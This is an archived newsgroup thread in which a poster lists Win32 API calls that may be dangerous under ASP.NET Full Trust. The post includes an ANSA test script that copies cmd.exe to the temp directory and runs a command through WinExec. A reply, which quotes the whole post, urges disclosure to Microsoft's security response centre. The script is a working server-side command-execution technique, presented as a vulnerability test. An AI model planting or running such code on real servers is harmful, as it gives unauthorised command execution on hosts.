Asp.Net.Vulnerability: Win32 API calls (potential security problems)


D

Dinis Cruz

Asp.Net.Vulnerability: Win32 API calls (potential security problems)

Since win32 calls are supported in Asp.Net and cannot be disabled when
the website is running with 'Full trust', it is imperative to identify
all potentially dangerous Win32 DLLs. Here is a short list of the ones
we have identified whose risk needs to validated and (if required)
write test scripts for:

- New: CopyMemory, GetCurrentProcess, GetCurrentThread,
GetTokenInformation, GetWindowsInformation, isNTAdmin,
OpenProcessToken, OpenTheadToken, SendMessage
- Compress: CopyLZFile, LZCopy
- Crypto: CryptGetUserKey, CryptDestroyKey
- Drives: GetLogicalDrives, GetVolumeInformation
- EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
- Error: RaiseExeption, ReportFault, SetLastError
- EventLog: OpenEventLog, ClearEventLog, ReportEvent
- Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
LockWorkstation
- Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
TouchFileTimes, Writefile, FindFile: FindClose, FindFirstFile,
FindNextFile
- Heap: GetProcessHeap, HeapAlloc, HeapFree
- Hook: CallNextHookEx, SetWindowsHookEx
- ICMP: IcmpCreateFile, IcmpSendEcho
- INI-Files: GetPrivateProfileSection , GetPrivateProfileString
- Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
InternetOpen, InternetOpenURL, InternetaReadFile,
IsDestinationReachable, IsNetworkAlive, IsValidURL, URLdownloadtoFile
- {List Not completed}

Since we are not Win32 API experts (although we did manage to write a
test script for the Kernel32 'WinExec' - see bellow) we would like ask
for help to the more serious win32 developers which will be able to
provide us with much more detailed and accurate information regarding
the 'security risk' posed by each API call.

The following is the code that we use in ANSA to test if a server is
vulnerable.

'****************************************************************
' ANSA:W32_execute_cmd - This test checks if it is possible to execute
' commands on the server using a direct Win32 API call to the
' kernel32 'winExec'function . For this test to work a copy of
'cmd.exe' must
' be copied to the same directory containing this script
'****************************************************************

<script runat=server>

Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal
lpExistingFileName As String, ByVal lpNewFileName As String, ByVal
bFailIfExists As Long) As Long

public Function Run_test(mode)

try
Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd,
Target_copy_of_cmd
Dim objStartup, objConfig, objProcess, errReturn, intProcessID,
temp_name
Dim FailIfExists

Dim Cmd_to_execute = "dir"

local_dir = left(request.servervariables("PATH_TRANSLATED"), _

inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
local_copy_of_cmd = Local_dir+"cmd.exe"
Target_copy_of_cmd =
Environment.GetEnvironmentVariable("Temp")+"\_test.exe"

' Copy CMD.EXE to temp directory
CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)

' Execute Command and save results in temp file
errReturn = WinExec(Target_copy_of_cmd + " /c " +
cmd_to_execute, 10)


Run_test = OK + Critical +" The server allows the remote
execution of commands using a direct call to WinExec API!"
catch
Run_test = OK + low + "It was not possible to execute commands
using cmd.exe"
end try

end function

</script>

'****************************************************************

Thanks for the help

Best regards
 
Ad

Advertisements

S

Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]

Dinis ..why not forward this as it should be to (e-mail address removed)

The Microsoft Security Response Center (MSRC) draws on the hundreds of
security professionals at Microsoft to form virtual teams that respond
to reports of security issues with Microsoft products or technologies.
To report a suspected vulnerability, please send e-mail to
(e-mail address removed).

Posting a potential vulnerablity to a public newsgroup is not showing
good judgement for dislosure of vulnerabilities assuming these are valid.

Report responsbility for all of our benefit on the Internet.

Susan

Dinis said:
Asp.Net.Vulnerability: Win32 API calls (potential security problems)

Since win32 calls are supported in Asp.Net and cannot be disabled when
the website is running with 'Full trust', it is imperative to identify
all potentially dangerous Win32 DLLs. Here is a short list of the ones
we have identified whose risk needs to validated and (if required)
write test scripts for:

- New: CopyMemory, GetCurrentProcess, GetCurrentThread,
GetTokenInformation, GetWindowsInformation, isNTAdmin,
OpenProcessToken, OpenTheadToken, SendMessage
- Compress: CopyLZFile, LZCopy
- Crypto: CryptGetUserKey, CryptDestroyKey
- Drives: GetLogicalDrives, GetVolumeInformation
- EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
- Error: RaiseExeption, ReportFault, SetLastError
- EventLog: OpenEventLog, ClearEventLog, ReportEvent
- Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
LockWorkstation
- Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
TouchFileTimes, Writefile, FindFile: FindClose, FindFirstFile,
FindNextFile
- Heap: GetProcessHeap, HeapAlloc, HeapFree
- Hook: CallNextHookEx, SetWindowsHookEx
- ICMP: IcmpCreateFile, IcmpSendEcho
- INI-Files: GetPrivateProfileSection , GetPrivateProfileString
- Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
InternetOpen, InternetOpenURL, InternetaReadFile,
IsDestinationReachable, IsNetworkAlive, IsValidURL, URLdownloadtoFile
- {List Not completed}

Since we are not Win32 API experts (although we did manage to write a
test script for the Kernel32 'WinExec' - see bellow) we would like ask
for help to the more serious win32 developers which will be able to
provide us with much more detailed and accurate information regarding
the 'security risk' posed by each API call.

The following is the code that we use in ANSA to test if a server is
vulnerable.

'****************************************************************
' ANSA:W32_execute_cmd - This test checks if it is possible to execute
' commands on the server using a direct Win32 API call to the
' kernel32 'winExec'function . For this test to work a copy of
'cmd.exe' must
' be copied to the same directory containing this script
'****************************************************************

<script runat=server>

Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal
lpExistingFileName As String, ByVal lpNewFileName As String, ByVal
bFailIfExists As Long) As Long

public Function Run_test(mode)

try
Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd,
Target_copy_of_cmd
Dim objStartup, objConfig, objProcess, errReturn, intProcessID,
temp_name
Dim FailIfExists

Dim Cmd_to_execute = "dir"

local_dir = left(request.servervariables("PATH_TRANSLATED"), _

inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
local_copy_of_cmd = Local_dir+"cmd.exe"
Target_copy_of_cmd =
Environment.GetEnvironmentVariable("Temp")+"\_test.exe"

' Copy CMD.EXE to temp directory
CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)

' Execute Command and save results in temp file
errReturn = WinExec(Target_copy_of_cmd + " /c " +
cmd_to_execute, 10)


Run_test = OK + Critical +" The server allows the remote
execution of commands using a direct call to WinExec API!"
catch
Run_test = OK + low + "It was not possible to execute commands
using cmd.exe"
end try

end function

</script>

'****************************************************************

Thanks for the help

Best regards

--
"Don't lose sight of security. Security is a state of being,
not a state of budget. He with the most firewalls still does
not win. Put down that honeypot and keep up to date on your patches.
Demand better security from vendors and hold them responsible.
Use what you have, and make sure you know how to use it properly
and effectively."
~Rain Forest Puppy
http://www.wiretrip.net/rfp/txt/evolution.txt
 

Top